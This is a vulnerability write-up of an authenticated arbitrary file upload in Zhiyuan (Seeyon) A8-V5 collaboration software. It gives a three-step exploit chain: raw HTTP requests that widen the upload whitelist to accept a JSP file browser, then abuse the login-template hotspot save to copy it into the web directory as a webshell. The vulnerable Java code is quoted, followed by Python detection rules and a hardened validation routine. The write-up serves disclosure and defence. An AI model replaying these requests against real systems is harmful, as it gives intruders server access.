Zhiyuan A8-V5 collaborative management software normal user Arbitrary File Upload (kill V5)
I have spent the past few days looking at Zhiyuan A8-V5. Yesterday I found a few small problems; today, digging further, I found an arbitrary file upload vulnerability.
Zhiyuan A8-V5 collaborative management software lets ordinary users call the System-Permission function [Login Page Template management]. Although this function cannot be reached directly from the browser (it prompts that the permission is insufficient), the request packets can be sent directly.
Zhiyuan A8-V5 collaborative management software does take the danger of file upload into account: throughout the system, uploaded files are written to a cache outside the web directory, so a webshell cannot be obtained directly. However, a webshell can still be obtained by using [Login Page Template management] to migrate the cached file into the web directory.
Steps:
1. Obtain the template ID using valid sessions
2. Break through the restrictions to upload jsp executable files
3. Use Dynamic Migration Technology to migrate files cached outside the web directory to any web directory
1. Obtain the template ID using valid sessions
Request:
POST /seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager HTTP/1.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://a8v51.seeyon.com/seeyon/portal/loginTemplateController.do?method=loginTemplateMain&entityType=1&_resourceCode=T03_loginTemplateList
Accept-Language: zh-cn
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: a8v51.seeyon.com
Content-Length: 74
DNT: 1
Pragma: no-cache
Cookie: JSESSIONID=4DD87116B4082E92D03F5BB3F7F0C56F; loginPageURL="/main.do"; avatarImageUrl=8469117046183055270; Hm_lvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849; Hm_lpvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849

managerMethod=selectTemplateById&arguments=["2676694155142778633"]
Response:
{"name":"Logon page-Single Image","path":"default/login.jsp","description":"Single Image, simple style","updateTime":"","sort":"1","preset":1,"updateUser":"8469117046183055270","cdefault":0,"thumbnail":"default/thumbnail.png","id":"2676694155142778633","new":false,"extraMap":{}}
The value of the id field in the response, 2676694155142778633, needs to be recorded.
2. Break through the restrictions to upload jsp executable files
You need to modify the extensions field of the original POST request, appending jsp after "jpg,jpeg,gif,bmp,png", and change the file name in filename from .jpg to .jsp.
After modification, the request is as follows:
POST /seeyon/fileUpload.do?method=processUpload HTTP/1.0
Accept: text/html, application/xhtml+xml, */*
Referer: http://a8v51.seeyon.com/seeyon/fileUpload.do?type=&firstSave=true&applicationCategory=1&extensions=jpg,jpeg,gif,bmp,png&quantity=1&isEncrypt=false&attachmentTrId=poi3&callMethod=uploadCallBack2&maxSize=2097152&takeOver=true&_isModalDialog=true
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: multipart/form-data; boundary=---------------------------7ded626340460
Proxy-Connection: Keep-Alive
Pragma: no-cache
Content-Length: 76766
DNT: 1
Host: a8v51.seeyon.com
Cookie: JSESSIONID=3385E1567ED6D100FD461F2299761286; loginPageURL="/main.do"; avatarImageUrl=-7273032013234748168; pgv_pvi=3462602752

-----------------------------7ded626340460
Content-Disposition: form-data; name="type"

-----------------------------7ded626340460
Content-Disposition: form-data; name="extensions"

jpg,jpeg,gif,bmp,png,jsp
-----------------------------7ded626340460
Content-Disposition: form-data; name="applicationCategory"

1
-----------------------------7ded626340460
Content-Disposition: form-data; name="destDirectory"

-----------------------------7ded626340460
Content-Disposition: form-data; name="destFilename"

-----------------------------7ded626340460
Content-Disposition: form-data; name="maxSize"

2097152
-----------------------------7ded626340460
Content-Disposition: form-data; name="isEncrypt"

false
-----------------------------7ded626340460
Content-Disposition: form-data; name="callMethod"

uploadCallBack2
-----------------------------7ded626340460
Content-Disposition: form-data; name="attachmentTrId"

poi3
-----------------------------7ded626340460
Content-Disposition: form-data; name="firstSave"

true
-----------------------------7ded626340460
Content-Disposition: form-data; name="takeOver"

true
-----------------------------7ded626340460
Content-Disposition: form-data; name="file1"; filename="wooyun.jsp"
Content-Type: text/plain

<%--jsp File browser 1.2--%>
-----------------------------7ded626340460--
Find ".jsp" in the response and record the value "-4028755744185366901" from this line:
fileurls=fileurls+","+'-4028755744185366901';
3. Use Dynamic Migration Technology to migrate files cached outside the web directory to any web directory
First, let's look at how the source code is written:
    if ("1".equals(hotSpotType)) {
        String picFileId = (String) params.get("picFileId" + i);
        if (picFileId != null && picFileId.trim().length() > 0) {
            // picFileId is looked up in the upload cache outside the web directory
            File uploadedFile = this.fileManager.getFile(Long.valueOf(Long.parseLong(picFileId)), new Date());
            try {
                // the target directory and extension both come from hotspotvalue, which is client-supplied
                String targetUrl = hotspotvalue.substring(0, hotspotvalue.lastIndexOf("/") + 1)
                        + picFileId
                        + hotspotvalue.substring(hotspotvalue.lastIndexOf("."), hotspotvalue.length());
                // the cached file is copied under the template path, which is inside the web directory
                FileCopyUtils.copy(uploadedFile, new File(Template_Parent_Path + targetUrl));
                this.fileSynchronization.copy(new FileInputStream(uploadedFile), "main/login/" + targetUrl);
                hotspot.setHotspotvalue(targetUrl);
            } catch (IOException e) {
                throw new BusinessException("image file storage error:" + e);
            }
        }
    }
Two parameters are required for success: picFileId and targetUrl.
Okay. In this demonstration, the picFileId value is the -4028755744185366901 obtained in step 2.
targetUrl is computed as:
String targetUrl = hotspotvalue.substring(0, hotspotvalue.lastIndexOf("/") + 1) + picFileId + hotspotvalue.substring(hotspotvalue.lastIndexOf("."), hotspotvalue.length());
picFileId is known, and hotspotvalue can be customized, so both the target directory and the target extension are under the sender's control.
The customized location is in the last hotspot (picFileId7 and hotspotvalue7). If the id obtained in step 1 is different, replace the id below with the id from step 1.
The request is as follows:
POST /seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager&rnd=75321 HTTP/1.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://a8v51.seeyon.com/seeyon/portal/loginTemplateController.do?method=loginTemplateMain&entityType=1&_resourceCode=T03_loginTemplateList
Accept-Language: zh-cn
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: a8v51.seeyon.com
Content-Length: 5255
DNT: 1
Pragma: no-cache
Cookie: JSESSIONID=31BEBA9DAA457E8E8280E97175FD4DBB; loginPageURL="/main.do"; avatarImageUrl=-7273032013234748168; pgv_pvi=3462602752

managerMethod=transSaveTemplate&arguments=[{"id":"2676694155142778633","entityLevel":"system","entityId":"-1730833917365171641","name":"??????é?μ-????????????","description":"?????????????????????é£?? ?","sort":"1","path":"default/login.jsp","hotSpotsCount":"8",
"hotSpotId0":"1186536015593226561","hotSpotType0":"0","templateId0":"2676694155142778633","hotspotkey0":"note","description0":"","entityId0":"-1730833917365171641","entityLevel0":"System","hotspotName0":"hotspot.name.note","hotspotModule0":"0","hotspotSort0":"0","hotspotRead0":"0","showdisplay0":"0","hotAccountId0":"-1730833917365171641","hotspotvalue0":"è?′è??A8-V5????????????è?ˉ???",
"hotSpotId1":"-2858574230077355948","hotSpotType1":"0","templateId1":"2676694155142778633","hotspotkey1":"note","description1":"","entityId1":"-1730833917365171641","entityLevel1":"System","hotspotName1":"hotspot.name.note","hotspotModule1":"0","hotspotSort1":"0","hotspotRead1":"0","showdisplay1":"0","hotAccountId1":"-1730833917365171641","hotspotvalue1":"è?′è??A8-V5????????????è?ˉ???",
"hotSpotId2":"-6590619288520733107","hotSpotType2":"1","templateId2":"2676694155142778633","hotspotkey2":"contentbgi","description2":"","entityId2":"-1730833917365171641","entityLevel2":"System,Account","hotspotName2":"hotspot.name.loginpic","hotspotModule2":"0","hotspotSort2":"1","hotspotRead2":"0","showdisplay2":"0","hotAccountId2":"-1730833917365171641","picFileId2":"","hotspotvalue2":"default/images/main_content_ie6.jpg",
"hotSpotId3":"-151221304857771845","hotSpotType3":"1","templateId3":"2676694155142778633","hotspotkey3":"contentbgi","description3":"","entityId3":"-1730833917365171641","entityLevel3":"System,Account","hotspotName3":"hotspot.name.loginpic","hotspotModule3":"0","hotspotSort3":"1","hotspotRead3":"0","showdisplay3":"0","hotAccountId3":"-1730833917365171641","picFileId3":"","hotspotvalue3":"default/images/main_content_ie6.jpg",
"hotSpotId4":"-8315917587715897900","hotSpotType4":"2","templateId4":"2676694155142778633","hotspotkey4":"mainbgc","description4":"","entityId4":"-1730833917365171641","entityLevel4":"System,Account","hotspotName4":"hotspot.name.mainbgc","hotspotModule4":"0","hotspotSort4":"2","hotspotRead4":"0","showdisplay4":"0","hotAccountId4":"-1730833917365171641","hotspotvalue4":"#fafafa",
"hotSpotId5":"7763739069174663407","hotSpotType5":"2","templateId5":"2676694155142778633","hotspotkey5":"mainbgc","description5":"","entityId5":"-1730833917365171641","entityLevel5":"System,Account","hotspotName5":"hotspot.name.mainbgc","hotspotModule5":"0","hotspotSort5":"2","hotspotRead5":"0","showdisplay5":"0","hotAccountId5":"-1730833917365171641","hotspotvalue5":"#fafafa",
"hotSpotId6":"5768369956880141892","hotSpotType6":"1","templateId6":"2676694155142778633","hotspotkey6":"mainbgi","description6":"","entityId6":"-1730833917365171641","entityLevel6":"System","hotspotName6":"hotspot.name.mainbgi","hotspotModule6":"0","hotspotSort6":"3","hotspotRead6":"0","showdisplay6":"0","hotAccountId6":"-1730833917365171641","picFileId6":"","hotspotvalue6":"default/images/main_bg.png","hotspotTiling6":"1",
"hotSpotId7":"-3488186128041623434","hotSpotType7":"1","templateId7":"2676694155142778633","hotspotkey7":"mainbgi","description7":"","entityId7":"-1730833917365171641","entityLevel7":"System","hotspotName7":"hotspot.name.mainbgi","hotspotModule7":"0","hotspotSort7":"3","hotspotRead7":"0","showdisplay7":"0","hotAccountId7":"-1730833917365171641","picFileId7":"-4028755744185366901","hotspotvalue7":"default/-4028755744185366901.jsp","hotspotTiling7":"1"}]
Response: the response body is empty (null). At this point the cached file stored outside the web directory has been copied into the web directory.
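The three requests above are each visible to a request filter in front of the application, so they can be flagged before the copy happens. The following is an added example written for this page, not Seeyon's code: a small inspection routine with three rules, one per step of the write-up, run over constructed request records. The record format (role, path, already-parsed form fields, the multipart file name exposed as a "filename" field), the server-side whitelist and the sample requests are assumptions for the demonstration; the endpoints, parameter names and ids are the ones from the write-up.

```python
import json
from urllib.parse import parse_qs, urlsplit

# Image types the server should accept for login-page assets (assumption for
# this example; it matches the page's own list jpg,jpeg,gif,bmp,png).
SERVER_WHITELIST = {"jpg", "jpeg", "gif", "bmp", "png"}


def _query(path: str) -> dict:
    """First value of every query-string parameter."""
    return {k: v[0] for k, v in parse_qs(urlsplit(path).query).items()}


def _ext(name: str) -> str:
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def inspect_request(req: dict) -> list:
    """Return the findings for one parsed request.
    req = {"role": "user"|"admin", "method": ..., "path": ..., "fields": {...}}"""
    findings = []
    url = urlsplit(req["path"])
    q = _query(req["path"])
    f = req.get("fields", {})

    # Rule 1 (step 1): the template manager is an admin-only function; the check
    # has to hold at the ajax.do entry point, not only in the UI.
    if url.path == "/seeyon/ajax.do" and q.get("managerName") == "loginTemplateManager" \
            and req.get("role") != "admin":
        findings.append("loginTemplateManager called by non-admin session")

    # Rule 2 (step 2): the upload handler must not honour a client-widened
    # extensions list, and the file name itself must be an image name.
    if url.path == "/seeyon/fileUpload.do" and q.get("method") == "processUpload":
        submitted = {e.strip().lower() for e in f.get("extensions", "").split(",") if e.strip()}
        extra = submitted - SERVER_WHITELIST
        if extra:
            findings.append("extensions list widened beyond server whitelist: " + ",".join(sorted(extra)))
        if _ext(f.get("filename", "")) not in SERVER_WHITELIST:
            findings.append("uploaded filename is not an image: " + f.get("filename", ""))

    # Rule 3 (step 3): a hotspot save that pairs a cached file id with a
    # non-image target name is exactly the copy the write-up describes.
    if url.path == "/seeyon/ajax.do" and f.get("managerMethod") == "transSaveTemplate":
        try:
            args = json.loads(f.get("arguments", "[]"))
        except json.JSONDecodeError:
            findings.append("transSaveTemplate arguments is not valid JSON")
            return findings
        for tpl in args:
            for i in range(int(tpl.get("hotSpotsCount", "0"))):
                pic = tpl.get(f"picFileId{i}", "")
                value = tpl.get(f"hotspotvalue{i}", "")
                if tpl.get(f"hotSpotType{i}") == "1" and pic and _ext(value) not in SERVER_WHITELIST:
                    findings.append(f"hotspot {i}: picFileId {pic} would be copied as {value}")
    return findings


# Constructed request records modelled on the write-up's three steps, plus one
# legitimate admin save for comparison.
SAMPLE_REQUESTS = [
    {"role": "user", "method": "POST",
     "path": "/seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager",
     "fields": {"managerMethod": "selectTemplateById", "arguments": '["2676694155142778633"]'}},
    {"role": "user", "method": "POST",
     "path": "/seeyon/fileUpload.do?method=processUpload",
     "fields": {"extensions": "jpg,jpeg,gif,bmp,png,jsp", "filename": "wooyun.jsp"}},
    {"role": "user", "method": "POST",
     "path": "/seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager&rnd=75321",
     "fields": {"managerMethod": "transSaveTemplate", "arguments": json.dumps([{
         "id": "2676694155142778633", "hotSpotsCount": "2",
         "hotSpotType0": "1", "picFileId0": "", "hotspotvalue0": "default/images/main_bg.png",
         "hotSpotType1": "1", "picFileId1": "-4028755744185366901",
         "hotspotvalue1": "default/-4028755744185366901.jsp"}])}},
    {"role": "admin", "method": "POST",
     "path": "/seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager",
     "fields": {"managerMethod": "transSaveTemplate", "arguments": json.dumps([{
         "hotSpotsCount": "1", "hotSpotType0": "1", "picFileId0": "123",
         "hotspotvalue0": "default/images/main_bg.png"}])}},
]


def scan(requests=SAMPLE_REQUESTS) -> dict:
    """Map request index -> findings, omitting requests without any."""
    return {n: hits for n, req in enumerate(requests) if (hits := inspect_request(req))}


if __name__ == "__main__":
    for n, hits in scan().items():
        print(f"request {n}:")
        for h in hits:
            print("  -", h)
```

Rule 1 fires on the very first step, before any file exists, which is the cheapest place to stop this chain; rules 2 and 3 catch the upload and the copy independently, so a filter that only sees one of the two endpoints still has a signal.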
Solution:
Filter the inputs (the client-supplied extensions list, picFileId and the extension of hotspotvalue) before the cached file is copied into the web directory.
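As an added example (written for this page, not Seeyon's code), the Python below mirrors the targetUrl expression from step 3 so its behaviour on the write-up's own values can be checked, and then puts a hardened version of the same step beside it: numeric picFileId only, no traversal out of the template directory, an image extension only, and the cached file's leading bytes checked against that extension. The whitelist, the magic-byte table, the function names and the PNG sample bytes are assumptions for the demonstration; the ids and hotspotvalue strings are the ones from the write-up.

```python
import posixpath
import re

# Image types the login template editor legitimately stores (assumption for this
# example; the page's own upload whitelist is jpg,jpeg,gif,bmp,png).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "gif", "bmp", "png"}

# Leading bytes of the allowed formats, so the cached file's content is checked
# rather than the name the client chose for it (constructed table).
IMAGE_MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "bmp": (b"BM",),
}


class TemplateValidationError(ValueError):
    """Raised when a hotspot save request must be rejected."""


def derive_target_url(hotspotvalue: str, pic_file_id: str) -> str:
    """Python mirror of the page's Java expression: directory of hotspotvalue
    + picFileId + extension of hotspotvalue. Java's substring(-1) throws when
    there is no '.', so fail the same way here."""
    dot = hotspotvalue.rfind(".")
    if dot < 0:
        raise ValueError("hotspotvalue has no extension")
    slash = hotspotvalue.rfind("/") + 1
    return hotspotvalue[:slash] + pic_file_id + hotspotvalue[dot:]


def validate_pic_file_id(pic_file_id: str) -> int:
    # Long.parseLong accepts an optional '-' followed by digits only.
    if not re.fullmatch(r"-?\d{1,19}", pic_file_id):
        raise TemplateValidationError("picFileId is not a numeric file id")
    return int(pic_file_id)


def validate_hotspot_value(hotspotvalue: str) -> str:
    """The checks the vulnerable code lacks: relative path inside the template
    directory, no backslashes, image extension only."""
    if "\\" in hotspotvalue:
        raise TemplateValidationError("backslash in hotspotvalue")
    normalised = posixpath.normpath(hotspotvalue)
    if normalised.startswith("/") or normalised == ".." or normalised.startswith("../"):
        raise TemplateValidationError("hotspotvalue escapes the template directory")
    ext = normalised.rsplit(".", 1)[-1].lower() if "." in normalised else ""
    if ext not in ALLOWED_EXTENSIONS:
        raise TemplateValidationError(f"extension {ext!r} is not an allowed image type")
    return normalised


def looks_like_image(data: bytes, ext: str) -> bool:
    return any(data.startswith(magic) for magic in IMAGE_MAGIC[ext])


def safe_target_url(hotspotvalue: str, pic_file_id: str, cached_bytes: bytes) -> str:
    """Hardened replacement for the copy step: every input is validated before
    the path that FileCopyUtils.copy would write is computed."""
    validate_pic_file_id(pic_file_id)
    clean = validate_hotspot_value(hotspotvalue)
    ext = clean.rsplit(".", 1)[-1].lower()
    if not looks_like_image(cached_bytes, ext):
        raise TemplateValidationError("cached file content does not match an image type")
    return derive_target_url(clean, pic_file_id)


if __name__ == "__main__":
    PIC_ID = "-4028755744185366901"  # file id from step 2 of the write-up
    PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\0" * 16  # constructed image prefix
    # hotspotvalue7 from step 3 next to a legitimate image path for comparison.
    for value in ("default/-4028755744185366901.jsp", "default/images/main_bg.png"):
        print("vulnerable path ->", derive_target_url(value, PIC_ID))
        try:
            print("hardened path   ->", safe_target_url(value, PIC_ID, PNG_SAMPLE))
        except TemplateValidationError as exc:
            print("hardened path   -> rejected:", exc)
```

The extension check alone would already stop the write-up's request, but the magic-byte check is what makes the server independent of the client-supplied extensions list from step 2: a file named .png whose content is a JSP is rejected at the copy even if the upload handler let it through.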